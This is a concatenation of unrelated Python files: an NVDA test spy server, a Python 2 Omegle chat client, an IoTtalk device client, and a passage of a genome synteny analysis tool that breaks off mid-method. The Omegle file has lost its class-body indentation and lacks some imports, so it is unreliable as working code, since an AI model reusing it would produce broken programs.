    def init_max_keyword_duration(self, maxSeconds: float):
        """This should only be called once, immediately after importing the library.
        @param maxSeconds: Should match the 'timeout' value given to the `robot.libraries.Remote` instance. If
        this value is greater than the value for the `robot.libraries.Remote` instance it may mean that the test
        is failed, and NVDA is never exited, requiring manual intervention.
        Should be set to a large value like '30' (seconds).
        """
        self._maxKeywordDuration = maxSeconds - 1

    def wait_for_NVDA_startup_to_complete(self):
        _blockUntilConditionMet(
            getValue=lambda: self._isNvdaStartupComplete,
            giveUpAfterSeconds=self._minTimeout(10),
            errorMessage="Unable to connect to nvdaSpy",
        )
        if self._isNvdaStartupComplete:
            self.reset_all_speech_index()

    def get_last_speech(self) -> str:
        return self._getSpeechAtIndex(-1)

    def get_all_speech(self) -> str:
        return self.get_speech_at_index_until_now(self._allSpeechStartIndex)

    def reset_all_speech_index(self) -> int:
        self._allSpeechStartIndex = self.get_last_speech_index()
        return self._allSpeechStartIndex

    def get_next_speech_index(self) -> int:
        """ @return: the next index that will be used.
        """
        return self.get_last_speech_index() + 1

    def wait_for_specific_speech(
            self,
            speech: str,
            afterIndex: Optional[int] = None,
            maxWaitSeconds: int = 5,
    ) -> int:
        """
        @param speech: The speech to expect.
        @param afterIndex: The speech should come after this index. The index is exclusive.
        @param maxWaitSeconds: The amount of time to wait in seconds.
        @return: the index of the speech.
        """
        success, speechIndex = _blockUntilConditionMet(
            getValue=lambda: self._getIndexOfSpeech(speech, afterIndex),
            giveUpAfterSeconds=self._minTimeout(maxWaitSeconds),
            shouldStopEvaluator=lambda indexFound: indexFound >= (afterIndex if afterIndex else 0),
            intervalBetweenSeconds=0.1,
            errorMessage=None
        )
        if not success:
            self.dump_speech_to_log()
            raise AssertionError(
                "Specific speech did not occur before timeout: {}\n"
                "See NVDA log for dump of all speech.".format(speech)
            )
        return speechIndex

    def wait_for_speech_to_finish(
            self,
            maxWaitSeconds=5.0,
            speechStartedIndex: Optional[int] = None
    ):
        _blockUntilConditionMet(
            getValue=lambda: self._hasSpeechFinished(speechStartedIndex=speechStartedIndex),
            giveUpAfterSeconds=self._minTimeout(maxWaitSeconds),
            errorMessage="Speech did not finish before timeout"
        )

    def emulateKeyPress(self, kbIdentifier: str, blockUntilProcessed=True):
        """
        Emulates a key press using NVDA's input gesture framework.
        The key press will either result in a script being executed, or the key being sent on to the OS.
        By default this method will block until any script resulting from this key has been executed,
        and the NVDA core has again gone back to sleep.
        @param kbIdentifier: an NVDA keyboard gesture identifier.
        0 or more modifier keys followed by a main key, all separated by a plus (+) symbol.
        E.g. control+shift+downArrow.
        See vkCodes.py in the NVDA source directory for valid key names.
        """
        gesture = KeyboardInputGesture.fromName(kbIdentifier)
        inputCore.manager.emulateGesture(gesture)
        if blockUntilProcessed:
            # Emulating may have queued a script or events.
            # Insert our own function into the queue after, and wait for that to be also executed.
            # FIX: the flag is a boolean; it was previously initialised to an
            # (empty, falsy) set, which worked only by accident.
            queueProcessed = False

            def _setQueueProcessed():
                nonlocal queueProcessed
                queueProcessed = True

            queueHandler.queueFunction(queueHandler.eventQueue, _setQueueProcessed)
            _blockUntilConditionMet(
                getValue=lambda: queueProcessed,
                giveUpAfterSeconds=self._minTimeout(5),
                errorMessage="Timed out waiting for key to be processed",
            )
            # We know that by now the core will have woken up and processed the scripts, events and our own function.
            # Wait for the core to go to sleep,
            # Which means there is no more things the core is currently processing.
            _blockUntilConditionMet(
                getValue=lambda: watchdog.isCoreAsleep(),
                giveUpAfterSeconds=self._minTimeout(5),
                errorMessage="Timed out waiting for core to sleep again",
            )
class SystemTestSpyServer(globalPluginHandler.GlobalPlugin):
    """Global plugin that exposes NVDASpyLib over a Robot remote server."""

    def __init__(self):
        super().__init__()
        self._server = None
        self._start()

    def _start(self):
        log.debug("SystemTestSpyServer started")
        spy = NVDASpyLib()  # spies on NVDA
        remoteServerClass = _importRobotRemoteServer()
        # Port 8270 is the IANA-registered default for Robot remote servers
        # (two ASCII values, RF). serve=False so we can serve from a thread
        # instead of blocking NVDA's main thread.
        self._server = remoteServerClass(
            spy,
            port=8270,
            serve=False,
        )
        log.debug("Server address: {}".format(self._server.server_address))
        serveThread = threading.Thread(target=self._server.serve, name="RF Test Spy Thread")
        serveThread.start()

    def terminate(self):
        log.debug("Terminating the SystemTestSpyServer")
        self._server.stop()
# NVDA discovers plugins through the module-level name 'GlobalPlugin'.
GlobalPlugin = SystemTestSpyServer
# NOTE(review): assigned outside a class body, so the attribute really is
# named '__gestures' (no name mangling applies here) — confirm NVDA reads
# it under that name.
GlobalPlugin.__gestures = {
}
|
Omegle.py | #! /usr/bin/python
############################################################
############################################################
##
##
## Copyright 2015 William Whitty
## will.whitty.arbeit@gmail.com
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
##
############################################################
############################################################
# Import STD
import sys
import json
import time
import threading
import urllib2
# Import Global
# Import Local
def help_function():
    # Print the ASCII-art banner and the list of terminal commands
    # (next / kill / help) to stdout. Python 2 print statement.
    print """
      ___           ___           ___           ___           ___           ___
     /\  \         /\__\         /\  \         /\  \         /\__\         /\  \
    /::\  \       /::|  |       /::\  \       /::\  \       /:/  /        /::\  \
   /:/\:\  \     /:|:|  |      /:/\:\  \     /:/\:\  \     /:/  /        /:/\:\  \
  /:/  \:\  \   /:/|:|__|__   /::\~\:\  \   /:/  \:\  \   /:/  /        /::\~\:\  \
 /:/__/ \:\__\ /:/ |::::\__\ /:/\:\ \:\__\ /:/__/_\:\__\ /:/__/        /:/\:\ \:\__\
 \:\  \ /:/  / \/__/~~/:/  / \:\~\:\ \/__/ \:\  /\ \/__/ \:\  \        \:\~\:\ \/__/
  \:\  /:/  /        /:/  /   \:\ \:\__\    \:\ \:\__\    \:\  \        \:\ \:\__\
   \:\/:/  /        /:/  /     \:\ \/__/     \:\/:/  /     \:\  \        \:\ \/__/
    \::/  /        /:/  /       \:\__\        \::/  /       \:\__\       \:\__\
     \/__/         \/__/         \/__/         \/__/         \/__/        \/__/
    Coded by William Whitty.
    Connects you to Omegle.com, a site for talking with random strangers.
    Type:
       next   >    End the conversation and move to the next stranger
       kill   >    End all conversations and quit the program
       help   >    Show this dialog
"""
class Omegle:
""" Used for communication with Omegle """
def __init__(self, **kwargs):
""" Our constructor """
# Our connection ID
self.handle = None
self.stranger = None
# Begin a connection
if kwargs.get('connect', True):
self.connect()
def error(self, message = ''):
""" Give an error to the stdout """
print "Error: " + message
def valid(self):
""" Check the validity of internal variables """
# We were unable to create a connection
if self.handle == '{}':
self.error('could not connect to Omegle.com')
return False
# Everything is correct
return True
def response(self):
""" Get a RAW response from the stranger """
try:
return urlopen(self.stranger).read()
except:
return ''
def wait_callback(self):
""" Called when we are waiting for a connection """
print 'Waiting...'
def conn_callback(self):
""" Called when we are connected to an active user """
print 'Connected to a random stranger!\n'
def exit_callback(self):
""" Called when we are disconnected from a session """
print 'Stranger disconnected!\n'
self.connect()
def type_callback(self):
""" Called when the stranger is typing """
print 'Stranger is typing...'
def hear_callback(self, message):
""" Called when the stranger sends us a message """
print 'Stranger: ' + message
def listen(self):
""" Used to listen for convesation partner input """
# Error checking
if not self.valid():
return
# Loop until told to quit
while True:
# Get a response from the stranger
response = self.response()
# If the stranger has disconnected
if 'strangerDisconnected' in response:
self.exit_callback()
# If the stranger is typing...
elif 'typing' in response:
self.type_callback()
# If the stranger has sent us a message
elif 'gotMessage' in response:
self.hear_callback(response[16 : -3])
def connect(self):
""" Begin a new conversation """
# Initialise the connection and return the url
self.handle = urlopen('http://omegle.com/start').read()
# Check for errors
if not self.valid():
return
# Strip the handle string of quotations
self.handle = self.handle[1 : -1]
# Save our nevent request
self.stranger = Request('http://omegle.com/events', 'id=' + self.handle)
# Get the response
response = self.response()
# If we're still waiting for a stranger
if 'waiting' in response:
self.wait_callback()
# If we've got a good connection
if 'connected' in response:
self.conn_callback()
def process(self, message):
""" Check user input for terminal commands """
# Check for our exit button
if message == 'kill':
quit(0)
# Check for a help request
if message == 'help':
help_function()
return True
# No processing
return False
def type(self):
""" Tell Omegle that we're typing something """
# Check for a valid handle
if not self.valid():
return
# Tell Omegl that we're typing
urlopen('http://omegle.com/typing', 'id=' + self.handle).close()
def talk(self, message, **kwargs):
""" Send a message to our conversation partner """
# Output to the terminal
if kwargs.get('show', True):
print 'You: ' + message
# Process terminal commands
if kwargs.get('process', True):
if self.process(message):
return
# Error checking
if not self.valid():
return
# Talk to Omegle
msgReq = urlopen('http://omegle.com/send', 'msg=' + message + '&id=' + self.handle).close()
def start_thread(self):
    """Spawn the event listener in a background daemon thread.

    The daemon flag ensures the listener never blocks program exit while
    the main thread keeps reading user input.
    """
    worker = threading.Thread(target=self.listen)
    # A daemon thread must not keep the interpreter alive on exit.
    worker.daemon = True
    worker.start()
    # Keep a handle so user_input() can join/abandon the listener.
    self.listener = worker
def user_input(self):
    """Main interactive loop: pair with strangers and relay terminal input.

    (The original docstring here was a copy-paste of the message handler's.)
    Typing 'next' abandons the current conversation and pairs with a new
    stranger; 'kill'/'help' are handled downstream by process() via talk().
    """
    # Pointer to internal listener thread
    self.listener = None
    while True:
        # Connect to a new stranger
        self.connect()
        # Start listening for the stranger's events in the background
        self.start_thread()
        while True:
            # Tell Omegle that we're typing
            self.type()
            # Get some input from the user
            # NOTE(review): shadows the `input` builtin; harmless here.
            input = raw_input()
            if 'next' in input:
                # Abandon this conversation; join(0) does not block
                self.listener.join(0)
                break
            # Send the text to the stranger (already echoed by the terminal)
            self.talk(input, show=False)
if __name__ == '__main__':
    # Display the user help before anything else
    help_function()
    # Create our Omegle instance without auto-connecting; user_input()
    # drives the connect/re-connect loop itself.
    handle = Omegle(connect=False)
    handle.user_input()
|
DAN.py | import time, random, threading, requests
import csmapi
# Example device profile registered with the IoTtalk/EasyConnect server.
profile = {
    # 'd_name': None,
    'dm_name': 'MorSensor',  # device model name
    'u_name': 'yb',  # user name
    'is_sim': False,  # whether this device is simulated
    'df_list': ['Acceleration', 'Temperature'],  # device features exposed
}
# Device address; when None, the host MAC address is used instead.
mac_addr = None
# Control-channel state machine: 'SUSPEND' disables push/pull, 'RESUME' enables them.
state = 'SUSPEND' #for control channel
#state = 'RESUME'
# Device features currently selected by the server via SET_DF_STATUS.
SelectedDF = []
def ControlChannel():
    """Background loop polling the IoTtalk '__Ctl_O__' control channel.

    Reacts to server commands: RESUME/SUSPEND toggle the module-level
    `state`, and SET_DF_STATUS updates `SelectedDF` from a bitmask of
    enabled device features. Re-registers the device if the server no
    longer knows our address. Runs forever; started as a daemon thread
    by register_device().
    """
    global state, SelectedDF
    print('Device state:', state)
    # Dedicated session so control polling does not share connections
    # with data push/pull.
    NewSession=requests.Session()
    control_channel_timestamp = None
    while True:
        time.sleep(2)
        try:
            CH = csmapi.pull(MAC,'__Ctl_O__', NewSession)
            if CH != []:
                # Skip commands we have already processed.
                if control_channel_timestamp == CH[0][0]: continue
                control_channel_timestamp = CH[0][0]
                cmd = CH[0][1][0]
                if cmd == 'RESUME':
                    print('Device state: RESUME.')
                    state = 'RESUME'
                elif cmd == 'SUSPEND':
                    print('Device state: SUSPEND.')
                    state = 'SUSPEND'
                elif cmd == 'SET_DF_STATUS':
                    # Acknowledge the command back on the control input channel.
                    csmapi.push(MAC,'__Ctl_I__',['SET_DF_STATUS_RSP',{'cmd_params':CH[0][1][1]['cmd_params']}], NewSession)
                    # cmd_params[0] is a string bitmask, one char per feature.
                    DF_STATUS = list(CH[0][1][1]['cmd_params'][0])
                    SelectedDF = []
                    index=0
                    profile['df_list'] = csmapi.pull(MAC, 'profile')['df_list'] #new
                    for STATUS in DF_STATUS:
                        if STATUS == '1':
                            SelectedDF.append(profile['df_list'][index])
                        index=index+1
        except Exception as e:
            print ('Control error:', e)
            if str(e).find('mac_addr not found:') != -1:
                # Server forgot us (e.g. it restarted); register again.
                print('Reg_addr is not found. Try to re-register...')
                device_registration_with_retry()
            else:
                print('ControlChannel failed due to unknow reasons.')
                time.sleep(1)
def get_mac_addr():
    """Return this host's MAC address as 12 uppercase hex characters."""
    from uuid import getnode
    # Format the 48-bit node id as zero-padded uppercase hex; joining the
    # two-character chunks with no separator reproduces the flat string.
    node = getnode()
    pairs = [("%012X" % node)[pos:pos + 2] for pos in range(0, 12, 2)]
    return ''.join(pairs)
def detect_local_ec():
    """Discover a local EasyConnect/IoTtalk server via its UDP beacon.

    Listens on UDP port 17000 for a broadcast payload 'easyconnect' and
    points csmapi.ENDPOINT at http://<sender-ip>:9999. Blocks until a
    beacon is received.
    """
    EASYCONNECT_HOST=None
    import socket
    UDP_IP = ''
    UDP_PORT = 17000
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind((UDP_IP, UDP_PORT))
        while EASYCONNECT_HOST==None:
            print ('Searching for the IoTtalk server...')
            data, addr = s.recvfrom(1024)
            if str(data.decode()) == 'easyconnect':
                EASYCONNECT_HOST = 'http://{}:9999'.format(addr[0])
                csmapi.ENDPOINT=EASYCONNECT_HOST
                #print('IoTtalk server = {}'.format(csmapi.ENDPOINT))
    finally:
        # Fix: the original leaked the UDP socket; always release it.
        s.close()
# Per-feature timestamp of the last sample pulled (reset in register_device).
timestamp={}
# Device identifier used for every csmapi call; defaults to the host MAC.
MAC=get_mac_addr()
# Handle of the control-channel thread; created at most once in register_device.
thx=None
def register_device(addr):
    """Register this device with the IoTtalk server and start the control thread.

    Args:
        addr: device address to register under; when None the module-level
            MAC (host MAC address) is used. Raises whatever csmapi.register
            raises on failure (see device_registration_with_retry).
    """
    global MAC, profile, timestamp, thx
    # Fall back to UDP discovery when no endpoint was configured.
    if csmapi.ENDPOINT == None: detect_local_ec()
    if addr != None: MAC = addr
    # Reset per-feature pull timestamps so the first pull after
    # (re)registration is never mistaken for a stale sample.
    for i in profile['df_list']: timestamp[i] = ''
    print('IoTtalk Server = {}'.format(csmapi.ENDPOINT))
    profile['d_name'] = csmapi.register(MAC,profile)
    print ('This device has successfully registered.')
    print ('Device name = ' + profile['d_name'])
    # Start the control-channel poller exactly once per process.
    if thx == None:
        print ('Create control threading')
        thx=threading.Thread(target=ControlChannel) #for control channel
        thx.daemon = True #for control channel
        thx.start() #for control channel
def device_registration_with_retry(URL=None, addr=None):
    """Register the device, retrying once per second until it succeeds.

    Args:
        URL: optional IoTtalk server endpoint; overrides csmapi.ENDPOINT.
        addr: optional device address passed through to register_device().
    """
    if URL != None:
        csmapi.ENDPOINT = URL
    success = False
    while not success:
        try:
            register_device(addr)
            success = True
        except Exception as e:
            # Fix: the original used a Python-2-style trailing comma after
            # `print(...)`, which under Python 3 just builds a throwaway
            # tuple instead of suppressing the newline; print the failure
            # reason on a single line as intended.
            print('Attach failed:', e)
            time.sleep(1)
def pull(FEATURE_NAME):
    """Return the newest value pushed to FEATURE_NAME, or None.

    None is returned when the device is suspended, the feature has no
    data, the newest sample was already seen, or its payload is empty.
    """
    global timestamp
    # Suspended devices never hit the server.
    if state != 'RESUME':
        return None
    data = csmapi.pull(MAC, FEATURE_NAME)
    if data == []:
        return None
    sample_time = data[0][0]
    sample_value = data[0][1]
    # Ignore samples we have already delivered.
    if timestamp[FEATURE_NAME] == sample_time:
        return None
    timestamp[FEATURE_NAME] = sample_time
    return sample_value if sample_value != [] else None
def push(FEATURE_NAME, *data):
    """Push *data* to FEATURE_NAME on the server; a no-op (None) while suspended."""
    if state != 'RESUME':
        return None
    return csmapi.push(MAC, FEATURE_NAME, list(data))
def get_alias(FEATURE_NAME):
    """Return the server-side alias for FEATURE_NAME, or None on any error."""
    try:
        return csmapi.get_alias(MAC, FEATURE_NAME)
    except Exception:
        # Best-effort lookup: swallow server/transport errors.
        return None
def set_alias(FEATURE_NAME, alias):
    """Set the server-side alias for FEATURE_NAME; returns it, or None on error."""
    try:
        return csmapi.set_alias(MAC, FEATURE_NAME, alias)
    except Exception:
        # Best-effort update: swallow server/transport errors.
        return None
def deregister():
    """Deregister this device (identified by MAC) from the IoTtalk server."""
    return csmapi.deregister(MAC)
|
JoshuaTree2.py | #################
#### IMPORTS ####
import click, os, pandas as pd, numpy as np, subprocess, sys, shutil
from pybedtools import BedTool
from pyfaidx import Fasta
from itertools import combinations
import scipy.sparse as sps
import glob, re
from random import randint
from Bio import SeqIO, Phylo
from Bio.Phylo.TreeConstruction import DistanceTreeConstructor, _DistanceMatrix
#import multiprocessing as mp
from time import sleep
from pathos import multiprocessing as mp
from pathos.pp_map import ppmap
from Bio import AlignIO
from ete3 import PhyloTree, Tree,TreeStyle,NodeStyle,EvolTree
import networkx as nx
import matplotlib.pyplot as plt
import pickle
#################
#### CLASSES ####
#########################
#### SYNTENY CLASSES ####
class SuperSynteny:
    """Aggregate of pairwise synteny analyses across multiple genomes.

    Builds a graph whose nodes are genomic regions ('protID.chr\\txi\\txf'
    strings) and whose edges connect syntenic or physically-nearby regions;
    each connected component is exported as one multi-species FASTA for
    downstream alignment.

    NOTE(review): this code relies on Python-2 builtins (`reduce`, and
    `filter`/`map` returning lists); it will not run unchanged on Python 3.
    """
    def __init__(self, pairwise_syntenies, max_distance, q_genome = ''):
        # Keyed by synteny file path for lookup in the reference-mode method.
        self.pairwise_syntenies = {synteny.synteny_file: synteny for synteny in pairwise_syntenies}
        # Regions closer than this (bp) on the same chromosome are merged/linked.
        self.max_distance = max_distance
        # Optional reference Genome; when set, clustering is restricted to it.
        self.q_genome = q_genome
    def generate_global_synteny_graph(self, fasta_out_dir, memory=150):
        """Build the global region graph and write one FASTA per connected component.

        `memory` is the Xmx budget (GB) handed to the external reformat.sh call.
        """
        synteny_graph = nx.Graph()
        # One edge per syntenic block: query region <-> subject region.
        for synteny in self.pairwise_syntenies.values():
            synteny_graph.add_edges_from(zip(synteny.q_genome.protID+'.'+synteny.synteny_structure['q_chr']+'\t'+synteny.synteny_structure['q_xi']+'\t'+synteny.synteny_structure['q_xf'],
                                             synteny.s_genome.protID+'.'+synteny.synteny_structure['s_chr']+'\t'+synteny.synteny_structure['s_xi']+'\t'+synteny.synteny_structure['s_xf']))
        # Unique Genome objects seen across all pairwise analyses, keyed by protID.
        genomes = {genome.protID: genome for genome in set(reduce(lambda x,y: x+y,[[synteny.q_genome, synteny.s_genome] for synteny in self.pairwise_syntenies.values()]))}
        nodes_all = np.array(synteny_graph.nodes())
        if self.q_genome:
            # Cluster only reference-genome regions by physical proximity.
            nodes = np.array(filter(lambda x: x.startswith(self.q_genome.protID), nodes_all))
        else:
            nodes = nodes_all
        clustered_regions = BedTool('\n'.join(nodes),from_string=True).sort().cluster(d=self.max_distance).to_dataframe().astype(str)
        nodes = nodes_all
        # Re-key rows by their region string so cluster members map back to nodes.
        clustered_regions = clustered_regions.rename(dict(enumerate(clustered_regions['chrom']+'\t'+clustered_regions['start']+'\t'+clustered_regions['end'])))
        # Fully connect every proximity cluster ('name' is bedtools' cluster id).
        for cluster in clustered_regions['name'].unique():
            synteny_graph.add_edges_from(list(combinations(list(clustered_regions[clustered_regions['name'] == cluster].index),r=2)))
        # Self-loops keep singleton regions present as components.
        synteny_graph.add_edges_from(zip(nodes,nodes))
        connected_components = enumerate(list(nx.connected_components(synteny_graph)))
        #species_colors = {species:i for i,species in enumerate(genomes.keys())}
        #node_labels = {}
        #for i, regions in connected_components:
        #    for region in regions:
        #        node_labels[region] = species_colors[region.split('.')[0]]#i
        #plt.figure()
        #nx.draw_spectral(synteny_graph,node_color=np.vectorize(lambda x: node_labels[x])(nodes),arrows=False,node_size=10)
        #plt.savefig('./'+'spectral_layout.png',dpi=300)
        for i, regions in connected_components:#list(nx.connected_component_subgraphs(synteny_graph)):
            # Merge the component's regions per chromosome before extraction.
            regions = BedTool('\n'.join(regions),from_string=True).sort().merge(d=self.max_distance).to_dataframe().astype(dict(chrom=str,start=int,end=int))
            regions['species'] = regions['chrom'].map(lambda x: x.split('.')[0])
            regions['chrom'] = regions['chrom'].map(lambda x: x.split('.',1)[1])
            print(regions)
            with open(fasta_out_dir+'fasta_output.fa','w') as f:
                for species in regions['species'].unique():
                    f.write('\n'.join(['>%s.%s_%d_%d\n%s'%(species, chrom, start, end, str(genomes[species].fasta[chrom][start:end])) for chrom, start, end, species in map(tuple,regions[regions['species'] == species].values)]) + '\n')
            # Rewrap to 60 columns and rename to the numbered per-component file.
            subprocess.call('reformat.sh overwrite=true in=%s out=%s fastawrap=60 Xmx=%dG && rm %s'%(fasta_out_dir+'fasta_output.fa',fasta_out_dir+'FastaOut%d.fasta'%i,memory,fasta_out_dir+'fasta_output.fa') , shell=True)
        #global_synteny_matrix = nx.to_scipy_sparse_matrix(synteny_graph,nodelist=nodes)
        #n_components, connected_components = sps.csgraph.connected_components(global_synteny_matrix,directed=False)
        #for connected_component in connected_components:
        #    regions = np.
        self.synteny_graph = synteny_graph
        self.genomes = genomes
    def visualize_synteny_graph(self, work_dir = './'):
        """Save spectral-layout plots colored by species and by component."""
        work_dir += '/'
        nodes = np.array(self.synteny_graph.nodes())
        connected_components = enumerate(list(nx.connected_components(self.synteny_graph)))
        species_colors = {species:i for i,species in enumerate(self.genomes.keys())}
        node_labels_species = {}
        node_labels_component = {}
        for i, regions in connected_components:
            for region in regions:
                node_labels_species[region] = species_colors[region.split('.')[0]]#i
                node_labels_component[region] = i
        plt.figure()
        nx.draw_spectral(self.synteny_graph,node_color=np.vectorize(lambda x: node_labels_species[x])(nodes),arrows=False,node_size=10)
        plt.savefig(work_dir+'spectral_layout_species.png',dpi=300)
        plt.figure()
        nx.draw_spectral(self.synteny_graph,node_color=np.vectorize(lambda x: node_labels_component[x])(nodes),arrows=False,node_size=10)
        plt.savefig(work_dir+'spectral_layout_component.png',dpi=300)
    def generate_global_synteny_graph_reference(self, fasta_out_dir): # fixme add global synteny graph with no references... all sequences if syntenic Aij = 1, if within merge distance Aij = 1, just merge and output all connected components, probably easier and more straight forward, add global option for this, maybe separate method and circos_dropper like synteny computations, networkx plot final nodes
        """Reference-anchored variant: build a dense adjacency over query regions
        and emit one FASTA per connected component (query + subject sequences)."""
        global_synteny_indices = []
        for synteny in self.pairwise_syntenies.values():
            synteny.synteny_structure['name'] = np.array(synteny.synteny_structure.index)#synteny.synteny_structure['q_chr'] + '\t' + synteny.synteny_structure['q_xi'] + '\t' + synteny.synteny_structure['q_xf']#[['q_chr','q_xi','q_xf']]
            global_synteny_indices.extend([(synteny.synteny_file,name) for name in synteny.synteny_structure['name'].as_matrix().tolist()])
        # (synteny_file, region) MultiIndex lets one physical region appear per analysis.
        global_synteny_indices = pd.MultiIndex.from_tuples(global_synteny_indices,names=['synteny_file','region'])
        global_synteny_matrix = pd.DataFrame(np.zeros((len(global_synteny_indices),)*2),index=global_synteny_indices,columns=global_synteny_indices)
        global_synteny_matrix = global_synteny_matrix.sort_index(axis=0).sort_index(axis=1)
        referenced_regions = list(global_synteny_matrix.index)
        clustered_regions = BedTool(np.array(referenced_regions)[:,1].tolist()).sort().cluster(d=self.max_distance).to_dataframe().astype(str)
        #print(clustered_regions)
        clustered_regions = clustered_regions.rename(dict(enumerate(clustered_regions['chrom']+'\t'+clustered_regions['start']+'\t'+clustered_regions['end'])))
        for cluster in clustered_regions['name'].unique():
            list_regions = list(clustered_regions[clustered_regions['name'] == cluster].index)
            for region_i,region_j in list(combinations(list_regions,r=2)):
                global_synteny_matrix.loc[pd.IndexSlice[:,region_i],pd.IndexSlice[:,region_j]] = 1
                global_synteny_matrix.loc[pd.IndexSlice[:,region_j],pd.IndexSlice[:,region_i]] = 1
            for region_i in list_regions:
                global_synteny_matrix.loc[pd.IndexSlice[:,region_i],pd.IndexSlice[:,region_i]] = 1 # fixme add global mode
        """
regions_bed_files = dict(zip(regions,map(lambda x: BedTool(x,from_string=True),regions)))
for region_i,region_j in list(combinations(regions,r=2)) + zip(regions,regions):
if region_i == region_j:
global_synteny_matrix.loc[pd.IndexSlice[:,region_i],pd.IndexSlice[:,region_i]] = 1
else:
distance = int(str(regions_bed_files[region_i].closest(regions_bed_files[region_j],d=True)).split('\t')[-1])
if distance >=0 and distance <= self.max_distance:
global_synteny_matrix.loc[pd.IndexSlice[:,region_i],pd.IndexSlice[:,region_j]] = 1
global_synteny_matrix.loc[pd.IndexSlice[:,region_j],pd.IndexSlice[:,region_i]] = 1"""
        # NOTE(review): scipy's connected_components returns (n, labels) where
        # labels is a flat label array — iterating it as component lists below
        # looks wrong; verify before relying on this method.
        n_components, connected_components = sps.csgraph.connected_components(global_synteny_matrix.as_matrix())
        referenced_regions = np.array(referenced_regions)
        for i,connected_component_list in enumerate(connected_components):
            out_fasta = []
            q_regions = BedTool('\n'.join(np.vectorize(lambda region: region + '%s.%s'%(self.q_genome.protID,'_'.join(region)))(str(BedTool(map(lambda x: x.split(),referenced_regions[connected_component_list,1].tolist())).sort().merge(d=100000000000)).splitlines())),from_string=True).sequence(fi=self.q_genome.fasta,name=True)#np.vectorize(lambda region: region + '%s %s'%(self.q_genome.protID,' '.join(region)))(referenced_regions[connected_component_list]).tolist()
            out_fasta.append(q_regions)
            referenced_regions_s_species = referenced_regions[connected_component_list,:]
            # Pull the matching subject-side regions for every pairwise analysis involved.
            for species in set(referenced_regions_s_species[:,0]):
                s_regions = BedTool('\n'.join(np.vectorize(lambda region: region + '%s.%s'%(self.pairwise_syntenies[species].s_genome.protID,'_'.join(region)))(str(BedTool(map(lambda x: x.split(),np.vectorize(lambda x: '\t'.join(self.pairwise_syntenies[species].synteny_structure.loc[x,['s_chr','s_xi','s_xf']].as_matrix().tolist()))(referenced_regions_s_species[referenced_regions_s_species[:,0]==species,1]).tolist())).sort().merge(d=self.max_distance)).splitlines())),from_string=True).sequence(fi=self.pairwise_syntenies[species].s_genome.fasta,name=True)
                out_fasta.append(s_regions)
            with open(fasta_out_dir+'/'+'FastaOut%d.fa'%i,'w') as f:
                f.write(reduce(lambda x,y: x+'\n'+y,out_fasta))
    def test(self,region1, region2):
        """Adjacency predicate for two region strings: 1 when identical, within
        max_distance on the same chromosome, or known-syntenic; else 0."""
        syntenic_sequences = ['future_testing_in_development_global_mode']
        region1 = region1.split()
        region2 = region2.split()
        return 1 if region1 == region2 or (region1[0] == region2[0] and (int(region1[2]) + self.max_distance >= int(region2[1]) or int(region2[2]) + self.max_distance >= int(region1[1]))) or (region1,region2) in syntenic_sequences else 0
class PairwiseSynteny:
    """Synteny between one query Genome and one subject Genome.

    The core artifact is `synteny_structure`, a DataFrame of syntenic blocks
    with string columns q_chr, q_xi, q_xf, s_chr, s_xi, s_xf, indexed by the
    query region string 'q_chr\\tq_xi\\tq_xf'.
    """
    def __init__(self, q_genome, s_genome, synteny_file='', loci_threshold = 4):
        self.synteny_file = synteny_file
        self.q_genome = q_genome
        self.s_genome = s_genome
        # Minimum number of anchored gene pairs for a block to be kept.
        self.loci_threshold = loci_threshold
        self.chrom_colors = {}
    def generate_synteny_structure(self,synteny_path):
        """Take anchor file or synteny file and searches for starting and ending genes for each syntenic block"""
        if self.synteny_file.endswith('.unout'):
            self.unout2structure(self.q_genome, self.s_genome)
        elif self.synteny_file.endswith('.lifted.anchors'):
            self.anchor2structure(self.q_genome, self.s_genome)
        elif self.synteny_file.endswith('.bed'):
            self.import_synteny_structure()
        else:
            # No recognised input: run jcvi ortholog detection, then parse its anchors.
            self.run_synteny(self.q_genome,self.s_genome,synteny_path)
            self.anchor2structure(self.q_genome, self.s_genome)
        self.synteny_structure_index()
    def synteny_structure_index(self):
        """Re-index the block table by the query region string."""
        self.synteny_structure = self.synteny_structure.rename(dict(zip(range(self.synteny_structure.shape[0]),self.synteny_structure['q_chr']+'\t'+self.synteny_structure['q_xi']+'\t'+self.synteny_structure['q_xf'])))
    def import_synteny_structure(self):
        """Load precomputed blocks from a 6-column BED-like file."""
        self.synteny_structure = pd.read_table(self.synteny_file,header=None,names=['q_chr','q_xi','q_xf','s_chr','s_xi','s_xf'])
        self.synteny_structure_index()
        #self.synteny_structure = self.synteny_structure.rename(dict(enumerate((self.synteny_structure['q_chr']+'\t'+self.synteny_structure['q_xi']+'\t'+self.synteny_structure['q_xf']).as_matrix().tolist())))
    def unout2structure(self,q_genome,s_genome):
        """Parse a .unout synteny file into the block DataFrame.

        NOTE(review): assumes Python-2 `map` (returns a list) — TODO confirm.
        """
        with open(self.synteny_file,'r') as f:
            lines = np.array(f.read().splitlines())
        # Blocks are delimited by non-indented header lines.
        anchors = np.array_split(lines,np.where(np.vectorize(lambda line: line.startswith('\t') == 0)(lines))[0])
        synteny_structure = []
        for anchor in anchors:
            anchor = np.array(map(lambda line: line.split('\t')[1].split(','),anchor[1:].tolist()))
            if len(anchor) >= self.loci_threshold and anchor.tolist():
                # Columns 2/5 carry the query/subject gene identifiers.
                q_genes, s_genes = anchor[:,2], anchor[:,5]
                q_coords, s_coords = q_genome.df.loc[q_genes,:], s_genome.df.loc[s_genes,:]
                synteny_structure.append([q_coords.iloc[0,0],q_coords[['xi','xf']].values.min(),q_coords[['xi','xf']].values.max(),s_coords.iloc[0,0],s_coords[['xi','xf']].values.min(),s_coords[['xi','xf']].values.max()])
        self.synteny_structure = pd.DataFrame(synteny_structure,columns=['q_chr','q_xi','q_xf','s_chr','s_xi','s_xf']).astype(str)#,index = np.vectorize(lambda x: '\t'.join(map(str,x[:3])))(synteny_structure))
    def run_synteny(self,genome1,genome2, synteny_path):
        """Run jcvi's ortholog/anchor pipeline in synteny_path and record the anchors file."""
        pwd = os.getcwd()
